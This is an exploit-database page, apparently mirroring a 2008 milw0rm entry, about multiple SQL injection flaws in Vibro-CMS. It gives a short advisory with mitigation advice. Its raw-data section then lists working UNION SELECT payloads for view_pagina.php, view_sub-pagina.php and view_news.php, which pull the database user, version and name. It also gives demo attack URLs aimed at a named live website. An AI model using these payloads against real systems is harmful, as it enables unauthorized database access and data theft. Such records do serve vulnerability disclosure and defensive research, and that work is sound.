header-logo
Suggest Exploit
vendor:
Vibro-CMS
by:
StAkeR
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Vibro-CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Vibro-CMS Multiple Remote SQL Injection Vulnerabilities

Vibro-CMS is prone to multiple remote SQL injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit these issues to manipulate SQL queries, disclose sensitive information, modify data, and potentially compromise the application and the underlying database. The issues are present in the 'view_pagina.php', 'view_sub-pagina.php', and 'view_news.php' scripts.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. It is also possible to use stored procedures to mitigate the risk of SQL injection.
Source

Exploit-DB raw data:

/*
   -------------------------------------------------------
   Vibro-CMS Multiple Remote SQL Injection Vulnerabilities
   -------------------------------------------------------
   Discovered By StAkeR[at]hotmail[dot]it
   http://www.niclor.net/prodotti/Vibro-CMS
   -------------------------------------------------------

   * Remote SQL Injection
   * Note: Works Regardless PHP.ini Settings
   
   - view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/*
   - view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
   - view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
   
   * Demo
   
   - http://www.niclor.net/prodotti/Vibro-CMS/view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0/*
   - http://www.niclor.net/prodotti/Vibro-CMS/ view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
   - http://www.niclor.net/prodotti/Vibro-CMS/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
   
   

*/

# milw0rm.com [2008-11-04]